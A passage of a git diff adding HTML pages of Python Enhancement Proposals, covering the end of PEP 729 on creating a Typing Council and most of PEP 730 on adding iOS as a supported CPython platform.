
+

The Python type system was created by PEP 484, almost ten years ago. The type +system is now widely used, and typing has become an important tool for writing +good, maintainable Python code. Many changes have been made to the type system to cover +more use cases and improve usability. Several type checkers have been created, each +with their own strengths. The type annotation syntax has driven several major innovations +in the Python ecosystem, such as the popular dataclasses module, runtime type +checking and validation by packages such as Pydantic, +and static compilation by tools such as mypyc.

+

However, as the type system has grown, several interrelated problems with the current +way to manage the type system have become apparent.

+
+

PEPs are the only specification

+

The Python type system was initially created by a PEP (PEP 484), and +changes to the type system are still made by PEPs. The specification for +the Python type system, to the extent there is one, consists of this series +of PEPs. But Standards Track PEPs aren’t meant to be living documents +or specifications; they are change proposals.

+

An example may illustrate the problem here. Around the same time +as the introduction of the typing module by PEP 484, PEP 3156 +introduced the asyncio module, another major new feature that has +been instrumental to the success of Python 3. Both modules +have evolved greatly since their initial creation and inspired changes to the +core language.

+

However, asyncio and typing are different in an essential aspect: +a user who uses asyncio interacts only with the standard library itself, +while a user of typing has to also think about an external tool, the type +checker. The Python language reference covers the symbols in the typing module, but does +not (and should not) go into detail on how the full type system should be +interpreted by type checkers. That material currently exists only in the PEPs.

+

This problem is shared by the packaging ecosystem, which attempts to solve it +by maintaining a separate set of PyPA specifications.

+
+
+

It’s hard to evolve the specification

+

Because the PEPs are the only specification we have, anything that could be seen +as a change to the specification would theoretically require a new PEP. But that +is often too heavy a process for a small change. Sometimes changes are made +directly to old PEPs instead, but that goes against the idea that accepted and +implemented PEPs become historical documents that should no longer be changed.

+

Some concrete examples include:

+
    +
  • PEP 484 explicitly says that typing.NoReturn cannot be used in +argument annotations. Nevertheless, type checkers have long accepted such +usage.
  • +
  • A 2023 discussion +noted that PEP 561’s description of partial stubs is unclear, and +major type checkers did not implement it exactly as specified.
  • +
  • The widely used third-party typing_extensions package provides backports of new +type system features. Type checkers are expected to treat symbols in this +module the same as symbols in typing, but this is not explicitly +specified in any of the PEPs.
  • +
+
+
+

The type system is underspecified

+

While the PEPs provide a specification, they are often not sufficiently precise +(sometimes intentionally so). This is especially true as the combinatorial +complexity of the type system has grown.

+

It ends up falling to individual type checkers to decide how to navigate +underspecified areas. In cases where type checkers informally coordinate, this +results in de facto standards that aren’t clearly recorded anywhere, making +the type system less accessible to newcomers. For example:

+ +
+
+

The Steering Council is not well-placed to solve the above problems

+

The SC has the entire language in its remit, and is not well-placed to make +decisions that are purely about the type system – if only because they don’t have +the time to deal with type system arcana alongside their other responsibilities. +This is similar in spirit to the reasons why the Steering Council sometimes uses +PEP delegation.

+
+
+

Endorsements

+

This PEP was endorsed by maintainers of all major +type checkers, including Rebecca Chen (pytype), +Eric Traut (Pyright), +and privately by maintainers of mypy and Pyre.

+
+
+
+

Specification

+

We propose the creation of a new group, the Typing Council. This group will +be responsible for developing and maintaining the Python type system, and +for solving the above problems.

+

The “operations and process” section describes how this group would operate and +be governed.

+

The more exciting “projects” section describes solutions to the above problems +that the Typing Council could shepherd.

+
+

Mandate

+

The Typing Council’s mandate is to ensure that the Python type system is:

+
    +
  • Useful: The type system should serve common use cases. As identified +by PEP 484, the primary use case is static analysis, but there are others, +such as runtime type checking, static compilation, IDE support, and documentation. +The Typing Council should consider all of these use cases when making decisions, +and be open to supporting additional use cases as they come up.
  • +
  • Usable: The type system should be easy to use for Python developers. It +should be ergonomic to write well-typed Python code that is accepted by type +checkers. There should be good documentation for the type system.
  • +
  • Stable: As the type system matures, users should be able to rely on their +typed code continuing to work and be able to trust their mental model for the +type system. Changes should be made with care and in a way +that minimizes disruption. Nevertheless, the type system should be able to +evolve, and it does not make sense to use the same compatibility guidelines +for type checker behavior as for Python itself. Of course, the existence +and runtime behavior of objects in the typing module does follow +Python’s standard compatibility policy in PEP 387.
  • +
+
+
+

Operations and process

+

The council would have three to five members, comprised of prominent community members, +such as Python core developers and maintainers of major type checkers. The members +should include people affiliated with a variety of projects related to type checking, +which may include type checkers, CPython, typeshed, or other projects.

+

The initial members of the council are:

+
    +
  • Eric Traut (Pyright; author of PEP 647, PEP 681, and PEP 695)
  • +
  • Guido van Rossum (core developer; author of PEP 484 and PEP 526)
  • +
  • Jelle Zijlstra (core developer; typeshed; pyanalyze; author of PEP 688 and PEP 702)
  • +
  • Rebecca Chen (pytype)
  • +
  • Shantanu Jain (core developer; typeshed; mypy)
  • +
+

Current membership of the council is recorded in the +python/typing-council repository.

+

There is no term +limit for council members. Council members may resign their position at any time. +There is an expectation that each member serves at most five consecutive years +before resigning.

+

If there is a vacancy and there are three or more remaining members, it is up +to the Council to decide whether to appoint a new member. +To determine replacements, nominations will be collected from the typing +community. Self-nominations are allowed. The existing Typing Council will then decide +the replacement member(s) from the nominees. The expectation is that this would +be done by fiat, but the Typing Council can choose a replacement by any means +they see fit, including a vote.

+

The Typing Council remains accountable to the Steering Council. At any point, +for any reason, the Steering Council could (publicly or privately) make a +specific change or request a non-specific change to the composition of the +Typing Council.

+

We acknowledge that this is a not particularly democratic structure and puts +a lot of faith in the Typing Council. However, the Python community has a long +history of success with not particularly democratic structures! We believe +self-governance, cycling of membership, and accountability to the +Steering Council will be sufficient to ensure that the Typing Council is meeting +the needs of the community.

+

The council would operate primarily through reviews of GitHub PRs. Regular +meetings are likely not necessary, but the council may set up video calls, a +private chat, or whatever other mechanism they decide upon internally.

+

The council should aim for transparency, posting all decisions publicly on +discuss.python.org, with a +rationale if possible. Before making a decision, the council should give +all interested community members a chance to weigh in. There should be at +least a week between the start of a discussion and the council’s decision.

+

Members of the council will be eligible to sponsor PEPs. If this PEP is accepted, +PEP 1 should be amended to note this fact.

+
+

Relationship with the Steering Council

+

Just like today, the Python Steering Council would remain responsible for the +overall direction of the Python language and would continue to decide on +typing-related PEPs. The Typing Council would provide written opinions and +recommendations to the Steering Council on typing-related PEPs.

+

However, smaller changes to the type system could be made +by the Typing Council directly. The Steering Council could also choose +to delegate decisions on some PEPs to the Typing Council (exactly as any other +PEP delegation).

+

Some examples of how past and recent issues could have been handled under this model:

+
    +
  • A PEP like PEP 695 (type parameter syntax), which changes the language +syntax, would need to be decided upon by the Steering Council; the Typing +Council would merely provide opinion or endorsement. Similarly, PEPs +like PEP 702 (deprecations) would be decided upon by the Steering +Council, because it concerns runtime behaviour beyond pure typing. Other examples +that would need to be decided by the SC include PEP 718 (subscriptable +functions) and PEP 727 (documentation metadata).
  • +
  • A PEP like PEP 698 (@override), which affects only users of type +checkers and does not change the overall language, would also by default +be decided upon by the Steering Council. However, such PEPs could be +delegated to the Typing Council for a decision (like any other PEP delegation). +Other examples of PEPs that could potentially be delegated include +PEP 647 (type guards), PEP 655 (individual required TypedDict items), +PEP 673 (Self), and PEP 675 (Literal).
  • +
  • Adding a smaller feature, such as typing.Never as an alias for +typing.NoReturn, would be done by means of a PR to the spec and +conformance test suite. The Typing +Council would then decide whether or not to merge the PR. They may ask for the +feature to be specified and discussed in a PEP if they feel that is warranted.
  • +
  • If there is confusion about the interpretation of some part of the spec, like +happened recently with partial stubs in PEP +561, +somebody would make a PR to the typing specification to clarify the +spec, and then the Typing Council would decide on the spec change.
  • +
+

The runtime typing module will continue to be maintained by the +CPython core developer team. However, any changes to the runtime module that +affect type checker behavior should be made in conjunction with a change +to the specification (see below) and should be approved by the Typing Council. +For example, in Python 3.11 the core developers added the new function +typing.assert_type(). If the Typing Council had been in place, this +change would require a matching change to the specification and approval +by the Typing Council. On the other hand, Python 3.11 also added the +typing.get_overloads() introspection helper. As this function does not +affect type checker behavior, it would not require approval by the Typing +Council. However, as support for runtime type checkers is within the remit +of the Council, they should monitor such changes and provide feedback when +appropriate.

+
+
+

Relationship with type checkers

+

The Typing Council has no direct authority over type checkers; it cannot +force them to implement particular features or make behavior changes. Type +checkers are incentivized to follow the specification set out by the Council +because it allows them to take advantage of shared resources, such as +libraries that expose typing information that follows the specification, +the stub files in typeshed, the typing standard library module, and +user documentation that covers the standard type system. +Type checkers are free to extend the type system or deviate from the +specification, but they should document such differences clearly.

+

The fact that type checkers need to implement any decisions made by the +Typing Council acts as a useful brake on the Council, ensuring that its +decisions are conservative and well-considered. Individual type checkers +remain free to innovate as they see fit, and successful innovations can +be incorporated into the standard type system.

+
+
+
+

Projects

+

Here are some efforts a Typing Council would be responsible for.

+
+

Conformance test suite

+

A conformance test suite would provide machine checkable documentation for how +type checkers should check Python code, accompanied by the results of major type +checker implementations on the test suite. A rough sketch for what this could +look like was created by Shantanu.

+

This would contain prescriptive tests from behavior prescribed by previous PEPs +and descriptive tests that let us document behavior of existing implementations +in areas that are not prescribed by any standard. These descriptions would be +useful to inform efforts below and to identify areas of focus for +standardization.

+
+
+

Specification for the type system

+

A specification would initially be created by stitching together the +specification sections from the existing PEPs, and then gradually improved to +clarify points of confusion and cover more areas. A draft of such a +stitched-together spec was created by Jelle.

+

The specification has a few audiences:

+
    +
  • For type checkers, it provides a description of how an idealized type checker +should behave. Individual type checkers have different goals and technical +constraints and they are free to deviate from the spec if they do not have the +resources to fully implement it or if they believe a different behavior better +serves their users. However, they should document such deviations from the +spec.
  • +
  • For projects such as typeshed, or libraries that want to be compatible with +multiple type checkers, it provides a set of rules that they can follow to +make their code understood by type checkers.
  • +
  • For people who want to propose changes to the type system, it provides a +foundation for any new proposals.
  • +
+

Notably, the specification is not aimed at application developers who use +typing. Such users typically do not +need to worry about compatibility across type checkers. They +are better served by a more informal user-facing reference, which is discussed +in the next section.

+

There are different opinions within the community about how formal such a +specification should be. While this document recommends an incremental +approach that builds off existing specification, it does not aim to +prescribe a final state. The Typing Council would provide a mechanism +to allow the specification to evolve to meet the level of formality that +the community desires, for instance, by incorporating parts of +Kevin Millikin’s document on “Python Static Types” +as a means to achieve a better formalisation of the spec.

+

Proposed changes to the specification, including PEPs, should +generally be accompanied by the following:

+
    +
  • Buy-in from type checker maintainers to confirm that the +change can be implemented and maintained within their type +checkers.
  • +
  • For changes to existing features, a survey of the behavior +of existing type checkers. If existing type checkers +behave roughly similarly, that is evidence that their shared +behavior should be made part of the specification.
  • +
  • Changes to the conformance test suite that demonstrate the +specified behavior.
  • +
+
+
+

User-facing reference for the type system

+

Documentation is important for the success of the Python type system, so +the Typing Council should ensure that there is good documentation for the +type system.

+

As mentioned previously, PEPs are point in time change proposals aimed at +multiple audiences that are hard to clarify. This makes them ill-suited as user +documentation. The specification discussed in the previous section would +be a living document, but it would likely be too technical to serve as +documentation for normal usage.

+

Therefore, a separate user-facing reference for the type system would be +useful. Such an effort could expand the documentation on +typing.readthedocs.io and +reuse material from the documentation sections of individual type checkers +and the CPython documentation.

+
+
+
+

Amendments

+

This PEP serves as a charter for the Typing Council. Changes to its operation +can be made either through a new PEP or through a change to this PEP. In either +case, the change would be decided upon by the Steering Council after discussion +in the community.

+
+
+
+

Rejected ideas

+
+

Writing the specification from scratch

+

This PEP proposes creating the typing specification by starting from the +existing PEPs, then clarifying and improving the specification as necessary. +Some members of the community prefer to start from scratch, writing a new, +more formal specification covering the entire type system. This could +provide a more solid basis for the specification.

+

However, this would be a much larger undertaking. The existing formalization +effort by Kevin Millikin is a good start, but so far covers only a subset of +PEP 484. Covering the rest of the type system would likely require several +times more effort when we consider that major type system features such +as typing.Protocol, typing.Literal, and typing.TypedDict +were introduced only after PEP 484. It is not clear that there is even energy +in the community for such a huge undertaking. Even if someone steps up to +do all the work of putting together a specification, lots of effort would be +required from community members and type checker maintainers to consider +whether the specification accurately reflects current behavior, and if not, +whether the specification or the type checkers should change.

+

Starting with the existing PEPs creates a lower-quality specification, +but it means that the Typing Council can immediately start making a difference +anywhere in the type system by improving and clarifying the specification. +A formalization effort can still proceed by gradually replacing sections of the +specification.

+
+
+

Alternate governance mechanisms

+

An earlier draft of this PEP suggested that the Steering Council appoint +members of the Typing Council each year. The current Steering Council suggested +that it would be better to have the Typing Council self-organise and avoid +the need for the Steering Council to continuously supervise the Typing Council.

+

Alternate governance mechanisms are possible, including more democratic ones, +but these typically raise several thorny questions, require much heavier +amounts of process and are potentially more divisive. For example, see the PEP +8000 series, or recent discussions about alternative governance in other Python +subcommunities. Ultimately, the Typing Council exists under the authority of the +Steering Council, and so can rely on it to bootstrap governance and serve as an +accountability mechanism.

+
+
+

Do nothing

+

We are hopeful substantial progress will be made on projects that improve the +type system regardless of whether this PEP is accepted. We anticipate projects +like specification or the potential for PEP delegation would benefit more from a +Typing Council, and projects like end user documentation would benefit less. +Certainly the bottleneck is likely to be contributor effort, not governance.

+

However, currently the tools available to the community to resolve potential +contention are either establishment of approximate consensus or the exercise of +power by individual projects or contributors. While very valuable, the former is +a slow process that can often end in inaction. The latter can result in a less +consistent ecosystem. Finally, easily legible governance structures make the +community more accessible and equitable.

+
+
+
+

Contact

+

To ask the Typing Council for a decision, +community members may open an issue in the +python/typing-council +repository.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0729.rst

+

Last modified: 2024-10-17 12:49:39 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0730/index.html b/pep-0730/index.html new file mode 100644 index 00000000000..5ba82194529 --- /dev/null +++ b/pep-0730/index.html @@ -0,0 +1,706 @@ + + + + + + + + PEP 730 – Adding iOS as a supported platform | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 730 – Adding iOS as a supported platform

+
+
Author:
+
Russell Keith-Magee <russell at keith-magee.com>
+
Sponsor:
+
Ned Deily <nad at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
09-Oct-2023
+
Python-Version:
+
3.13
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at Using Python on iOS.

+

×

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

This PEP proposes adding iOS as a supported platform in CPython. The initial +goal is to achieve Tier 3 support for Python 3.13. This PEP describes the +technical aspects of the changes that are required to support iOS. It also +describes the project management concerns related to adoption of iOS as a Tier 3 +platform.

+
+
+

Motivation

+

Over the last 15 years, mobile platforms have become increasingly important +parts of the computing landscape. iOS is one of two operating systems that +control the vast majority of these devices. However, there is no official +support for iOS in CPython.

+

The BeeWare Project and Kivy +have both supported iOS for almost 10 years. This support has been able to +generate applications that have been accepted for publication in the iOS App +Store. This demonstrates the technical feasibility of iOS support.

+

It is important for the future of Python as a language that it is able to be +used on any hardware or OS that has widespread adoption. If Python cannot be +used a on a platform that has widespread use, adoption of the language will be +impacted as potential users will adopt other languages that do provide support +for these platforms.

+
+
+

Rationale

+
+

Development landscape

+

iOS provides a single API, but 2 distinct ABIs - iphoneos (physical +devices), and iphonesimulator. Each of these ABIs can be provided on +multiple CPU architectures. At time of writing, Apple officially supports +arm64 on the device ABI, and arm64 and x86_64 are supported on the +simulator ABI.

+

As with macOS, iOS supports the creation of “fat” binaries that contains +multiple CPU architectures. However, fat binaries cannot span ABIs. That is, +it is possible to have a fat simulator binary, and a fat device binary, but +it is not possible to create a single fat “iOS” binary that covers both +simulator and device needs. To support distribution of a single development +artefact, Apple uses an “XCframework” structure - a wrapper around multiple ABIs +that implement a common API.

+

iOS runs on a Darwin kernel, similar to macOS. However, there is a need to +differentiate between macOS and iOS at an implementation level, as there are +significant platform differences between iOS and macOS.

+

iOS code is compiled for compatibility against a minimum iOS version.

+

Apple frequently refers to “iPadOS” in their marketing material. However, from a +development perspective, there is no discernable difference between iPadOS and +iOS. A binary that has been compiled for the iphoneos or iphonesimulator +ABIs can be deployed on iPad.

+

Other Apple platforms, such as tvOS, watchOS, and visionOS, use different ABIs, +and are not covered by this PEP.

+
+
+

POSIX compliance

+

iOS is broadly a POSIX platform. However, similar to WASI/Emscripten, there are +POSIX APIs that exist on iOS, but cannot be used; and POSIX APIs that don’t +exist at all.

+

Most notable of these is the fact that iOS does not provide any form of +multiprocess support. fork and spawn both exist in the iOS API; +however, if they are invoked, the invoking iOS process stops, and the new +process doesn’t start.

+

Unlike WASI/Emscripten, threading is supported on iOS.

+

There are also significant limits to socket handling. Due to process sandboxing, +there is no availability of interprocess communication via socket. However, +sockets for network communication are available.

+
+
+

Dynamic libraries

+

The iOS App Store guidelines allow apps to be +written in languages other than Objective C or Swift. However, they have very +strict guidelines about the structure of apps that are submitted for +distribution.

+

iOS apps can use dynamically loaded libraries; however, there are very strict +requirements on how dynamically loaded content is packaged for use on iOS:

+
    +
  • Dynamic binary content must be compiled as dynamic libraries, not shared +objects or binary bundles.
  • +
  • They must be packaged in the app bundle as Frameworks.
  • +
  • Each Framework can only contain a single dynamic library.
  • +
  • The Framework must be contained in the iOS App’s Frameworks folder.
  • +
  • A Framework may not contain any non-library content.
  • +
+

This imposes some constraints on the operation of CPython. It is not possible +store binary modules in the lib-dynload and/or site-packages folders; +they must be stored in the app’s Frameworks folder, with each module wrapped in +a Framework. This also means that the common assumption that a Python module can +construct the location of a binary module by using the __file__ attribute of +the Python module no longer holds.

+

As with macOS, compiling a binary module that is accessible from a +statically-linked build of Python requires the use of the --undefined +dynamic_lookup option to avoid linking libpython3.x into every binary +module. However, on iOS, this compiler flag raises a deprecation warning when it +is used. A warning from this flag has been observed on macOS as well - however, +responses from Apple staff suggest that they do not intend to break the CPython +ecosystem by removing this option. As +Python does not currently have a notable presence on iOS, it is difficult to +judge whether iOS usage of this flag would fall under the same umbrella.

+
+
+

Console and interactive usage

+

Distribution of a traditional CPython REPL or interactive “python.exe” should +not be considered a goal of this work.

+

Mobile devices (including iOS) do not provide a TTY-style console. They do not +provide stdin, stdout or stderr. iOS provides a system log, and it +is possible to install a redirection so that all stdout and stderr +content is redirected to the system log; but there is no analog for stdin.

+

In addition, iOS places restrictions on downloading additional code at runtime +(as this behavior would be functionally indistinguishable from trying to work +around App Store review). As a result, a traditional “create a virtual +environment and pip install” development experience will not be viable on iOS.

+

It is possible to build an native iOS application that provides a REPL +interface. This would be closer to an IDLE-style user experience; however, +Tkinter cannot be used on iOS, so any app would require a ground-up rewrite. The +iOS app store already contains several examples of apps in this category (e.g., +Pythonista and Pyto). The focus of this work would be to provide +an embedded distribution that IDE-style native interfaces could utilize, not a +user-facing “app” interface to iOS on Python.

+
+
+
+

Specification

+
+

Platform identification

+
+

sys

+

sys.platform will identify as "ios" on both simulator and physical +devices.

+

sys.implementation._multiarch will describe the ABI and CPU architecture:

+
    +
  • "arm64-iphoneos" for ARM64 devices
  • +
  • "arm64-iphonesimulator" for ARM64 simulators
  • +
  • "x86_64-iphonesimulator" for x86_64 simulators
  • +
+
+
+

platform

+

platform will be modified to support returning iOS-specific details. Most of +the values returned by the platform module will match those returned by +os.uname(), with the exception of:

+
    +
  • platform.system() - "iOS" or iPadOS (depending on the hardware in +use), instead of "Darwin"
  • +
  • platform.release() - the iOS version number, as a string (e.g., +"16.6.1"), instead of the Darwin kernel version.
  • +
+

In addition, a platform.ios_ver() method will be added. This mirrors +platform.mac_ver(), which can be used to provide macOS version information. +ios_ver() will return a namedtuple that contains the following:

+
    +
  • system - the OS name (iOS or iPadOS, depending on hardware)
  • +
  • release - the iOS version, as a string (e.g., "16.6.1").
  • +
  • model - the model identifier of the device, as a string (e.g., +"iPhone13,2"). On simulators, this will return "iPhone" or "iPad", +depending on the simulator device.
  • +
  • is_simulator - a boolean indicating if the device is a simulator.
  • +
+
+
+

os

+

os.uname() will return the raw result of a POSIX uname() call. This will +result in the following values:

+
    +
  • sysname - "Darwin"
  • +
  • release - The Darwin kernel version (e.g., "22.6.0")
  • +
+

This approach treats the os module as a “raw” interface to system APIs, and +platform as a higher-level API providing more generally useful values.

+
+
+

sysconfig

+

The sysconfig module will use the minimum iOS version as part of +sysconfig.get_platform() (e.g., "ios-12.0-arm64-iphoneos"). The +sysconfigdata_name and Config makefile will follow the same patterns as +existing platforms (using sys.platform, sys.implementation._multiarch +etc.) to construct identifiers.

+
+
+
+

Subprocess support

+

iOS will leverage the pattern for disabling subprocesses established by +WASI/Emscripten. The subprocess module will raise an exception if an attempt +is made to start a subprocess, and os.fork and os.spawn calls will raise +an OSError.

+
+
+

Dynamic module loading

+

To accommodate iOS dynamic loading, the importlib bootstrap will be extended +to add a metapath finder that can convert a request for a Python binary module +into a Framework location. This finder will only be installed if sys.platform +== "ios".

+

This finder will convert a Python module name (e.g., foo.bar._whiz) into a +unique Framework name by using the full module name as the framework name (i.e., +foo.bar._whiz.framework). A framework is a directory; the finder will look +for a binary named foo.bar._whiz in that directory.

+
+
+

Compilation

+

The only binary format that will be supported is a dynamically-linkable +libpython3.x.dylib, packaged in an iOS-compatible framework format. While +the --undefined dynamic_lookup compiler option currently works, the +long-term viability of the option cannot be guaranteed. Rather than rely on a +compiler flag with an uncertain future, binary modules on iOS will be linked +with libpython3.x.dylib. This means iOS binary modules will not be loadable +by an executable that has been statically linked against libpython3.x.a. +Therefore, a static libpython3.x.a iOS library will not be supported. This +is the same pattern used by CPython on Windows.

+

Building CPython for iOS requires the use of the cross-platform tooling in +CPython’s configure build system. A single configure/make/make +install pass will produce a Python.framework artefact that can be used on +a single ABI and architecture.

+

Additional tooling will be required to merge the Python.framework builds for +multiple architectures into a single “fat” library. Tooling will also be +required to merge multiple ABIs into the XCframework format that Apple uses +to distribute multiple frameworks for different ABIs in a single bundle.

+

An Xcode project will be provided for the purpose of running the CPython test +suite. Tooling will be provided to automate the process of compiling the test +suite binary, start the simulator, install the test suite, and execute it.

+
+
+

Distribution

+

Adding iOS as a Tier 3 platform only requires adding support for compiling an +iOS-compatible build from an unpatched CPython code checkout. It does not +require production of officially distributed iOS artefacts for use by end-users.

+

If/when iOS is updated to Tier 2 or 1 support, the tooling used to generate an +XCframework package could be used to produce an iOS distribution artefact. +This could then be distributed as an “embedded distribution” analogous to the +Windows embedded distribution, or as a CocoaPod or Swift package that could be +added to an Xcode project.

+
+
+

CI resources

+

Anaconda has offered to provide physical hardware to +run iOS buildbots.

+

GitHub Actions is able to host iOS simulators on their macOS machines, and the +iOS simulator can be controlled by scripting environments. The free tier +currently only provides x86_64 macOS machines; however ARM64 runners recently +became available on paid plans. +However, in order to avoid exhausting macOS runner resources, a GitHub Actions +run for iOS will not be added as part of the standard CI configuration.

+
+
+

Packaging

+

iOS will not provide a “universal” wheel format. Instead, wheels will be +provided for each ABI-arch combination.

+

iOS wheels will use tags:

+
    +
  • ios_12_0_arm64_iphoneos
  • +
  • ios_12_0_arm64_iphonesimulator
  • +
  • ios_12_0_x86_64_iphonesimulator
  • +
+

In these tags, “12.0” is the minimum supported iOS version. As with macOS, the +tag will incorporate the minimum iOS version that is selected when the wheel is +compiled; a wheel compiled with a minimum iOS version of 15.0 would use the +ios_15_0_* tags. At time of writing, iOS 12.0 exposes most significant iOS +features, while reaching near 100% of devices; this will be used as a floor for +iOS version matching.

+

These wheels can include binary modules in-situ (i.e., co-located with the +Python source, in the same way as wheels for a desktop platform); however, they +will need to be post-processed as binary modules need to be moved into the +“Frameworks” location for distribution. This can be automated with an Xcode +build step.

+
+
+

PEP 11 Update

+

PEP 11 will be updated to include two of the iOS ABIs:

+
    +
  • arm64-apple-ios
  • +
  • arm64-apple-ios-simulator
  • +
+

Ned Deily will serve as the initial core team contact for these ABIs.

+

The x86_64-apple-ios-simulator target will be supported on a best-effort +basis, but will not be targeted for tier 3 support. This is due to the impending +deprecation of x86_64 as a simulation platform, combined with the difficulty of +commissioning x86_64 macOS hardware at this time.

+
+
+
+

Backwards Compatibility

+

Adding a new platform does not introduce any backwards compatibility concerns to +CPython itself.

+

There may be some backwards compatibility implications on the projects that have +historically provided CPython support (i.e., BeeWare and Kivy) if the final form +of any CPython patches don’t align with the patches they have historically used.

+

Although not strictly a backwards compatibility issue, there is a platform +adoption consideration. Although CPython itself may support iOS, if it is +unclear how to produce iOS-compatible wheels, and prominent libraries like +cryptography, Pillow, and NumPy don’t provide iOS wheels, the ability of the +community to adopt Python on iOS will be limited. Therefore, it will be +necessary to clearly document how projects can add iOS builds to their CI and +release tooling. Adding iOS support to tools like crossenv and cibuildwheel may be one way to achieve this.

+
+
+

Security Implications

+

Adding iOS as a new platform does not add any security implications.

+
+
+

How to Teach This

+

The education needs related to this PEP mostly relate to how end-users can add +iOS support to their own Xcode projects. This can be accomplished with +documentation and tutorials on that process. The need for this documentation +will increase if/when support raises from Tier 3 to Tier 2 or 1; however, this +transition should also be accompanied with simplified deployment artefacts (such +as a Cocoapod or Swift package) that are integrated with Xcode development.

+
+
+

Reference Implementation

+

The BeeWare Python-Apple-support repository contains a +reference patch and build tooling to compile a distributable artefact.

+

Briefcase provides a reference +implementation of code to execute test suites on iOS simulators. The Toga +Testbed is an example of +a test suite that is executed on the iOS simulator using GitHub Actions.

+
+
+

Rejected Ideas

+
+

Simulator identification

+

Earlier versions of this PEP suggested the inclusion of +sys.implementation._simulator attribute to identify when code is running on +device, or on a simulator. This was rejected due to the use of a protected name +for a public API, plus the pollution of the sys namespace with an +iOS-specific detail.

+

Another proposal during discussion was to include a generic +platform.is_emulator() API that could be implemented by any platform - for +example to differentiate running on x86_64 code on ARM64 hardware, or when +running in QEMU or other virtualization methods. This was rejected on the basis +that it wasn’t clear what a consistent interpretation of “emulator” would be, or +how an emulator would be detected outside of the iOS case.

+

The decision was made to keep this detail iOS-specific, and include it on the +platform.ios_ver() API.

+
+
+

GNU compiler triples

+

autoconf requires the use of a GNU compiler triple to identify build and +host platforms. However, the autoconf toolchain doesn’t provide native +support for iOS simulators, so we are left with the task of working out how to +squeeze iOS hardware into GNU’s naming regimen.

+

This can be done (with some patching of config.sub), but it leads to 2 major +sources of naming inconsistency:

+
    +
  • arm64 vs aarch64 as an identifier of 64-bit ARM hardware; and
  • +
  • What identifier is used to represent simulators.
  • +
+

Apple’s own tools use arm64 as the architecture, but appear to be tolerant +of aarch64 in some cases. The device platform is identified as iphoneos +and iphonesimulator.

+

Rust toolchains uses aarch64 as the architecture, and use +aarch64-apple-ios and aarch64-apple-ios-sim to identify the device +platform; however, they use x86_64-apple-ios to represent iOS simulators +on x86_64 hardware.

+

The decision was made to use arm64-apple-ios and +arm64-apple-ios-simulator because:

+
    +
  1. The autoconf toolchain already contains support for ios as a platform +in config.sub; it’s only the simulator that doesn’t have a representation.
  2. +
  3. The third part of the host triple is used as sys.platform.
  4. +
  5. When Apple’s own tools reference CPU architecture, they use arm64, and +the GNU tooling usage of the architecture isn’t visible outside the build +process.
  6. +
  7. When Apple’s own tools reference simulator status independent of the OS +(e.g., in the naming of Swift submodules), they use a -simulator suffix.
  8. +
  9. While some iOS packages will use Rust, all iOS packages will use Apple’s +tooling.
  10. +
+

The initially accepted version of this document used the aarch64 form as the PEP 11 identifier; this was corrected during finalization.

+
+
+

“Universal” wheel format

+

macOS currently supports 2 CPU architectures. To aid the end-user development +experience, Python defines a “universal2” wheel format that incorporates both +x86_64 and ARM64 binaries.

+

It would be conceptually possible to offer an analogous “universal” iOS wheel +format. However, this PEP does not use this approach, for 2 reasons.

+

Firstly, the experience on macOS, especially in the numerical Python ecosystem, +has been that universal wheels can be exceedingly difficult to accommodate. +While native macOS libraries maintain strong multi-platform support, and Python +itself has been updated, the vast majority of upstream non-Python libraries do +not provide multi-architecture build support. As a result, compiling universal +wheels inevitably requires multiple compilation passes, and complex decisions +over how to distribute header files for different architectures. As a result of +this complexity, many popular projects (including NumPy and Pillow) do not +provide universal wheels at all, instead providing separate ARM64 and x86_64 +wheels.

+

Secondly, historical experience is that iOS would require a much more fluid +“universal” definition. In the last 10 years, there have been at least 5 +different possible interpretations of “universal” that would apply to iOS, +including various combinations of armv6, armv7, armv7s, arm64, x86 and x86_64 +architectures, on device and simulator. If defined right now, “universal-iOS” +would likely include x86_64 and arm64 on simulator, and arm64 on device; +however, the pending deprecation of x86_64 hardware would add another +interpretation; and there may be a need to add arm64e as a new device +architecture in the future. Specifying iOS wheels as single-platform-only means +the Python core team can avoid an ongoing standardization discussion about the +updated “universal” formats.

+

It also means wheel publishers are able to make per-project decisions over which +platforms are feasible to support. For example, a project may choose to drop +x86_64 support, or adopt a new architecture earlier than other parts of the +Python ecosystem. Using platform-specific wheels means this decision can be left +to individual package publishers.

+

This decision comes at cost of making deployment more complicated. However, +deployment on iOS is already a complicated process that is best aided by tools. +At present, no binary merging is required, as there is only one on-device +architecture, and simulator binaries are not considered to be distributable +artefacts, so only one architecture is needed to build an app for a simulator.

+
+
+

Supporting static builds

+

While the long-term viability of the --undefined dynamic_lookup option +cannot be guaranteed, the option does exist, and it works. One option would be +to ignore the deprecation warning, and hope that Apple either reverses the +deprecation decision, or never finalizes the deprecation.

+

Given that Apple’s decision-making process is entirely opaque, this would be, at +best, a risky option. When combined with the fact that the broader iOS +development ecosystem encourages the use of frameworks, there are no legacy uses +of a static library to consider, and the only benefit to a statically-linked iOS +libpython3.x.a is a very slightly reduced app startup time, omitting support +for static builds of libpython3.x seems a reasonable compromise.

+

It is worth noting that there has been some discussion on an alternate approach +to linking on macOS that +would remove the need for the --undefined dynamic_lookup option, although +discussion on this approach appears to have stalled due to complications in +implementation. If those complications were to be overcome, it is highly likely +that the same approach could be used on iOS, which would make a statically +linked libpython3.x.a plausible.

+

The decision to link binary modules against libpython3.x.dylib would +complicate the introduction of static libpython3.x.a builds in the future, +as the process of moving to a different binary module linking approach would +require a clear way to differentate “dynamically-linked” iOS binary modules from +“static-compatible” iOS binary modules. However, given the lack of tangible +benefits of a static libpython3.x.a, it seems unlikely that there will be +any requirement to make this change.

+
+
+

Interactive/REPL mode

+

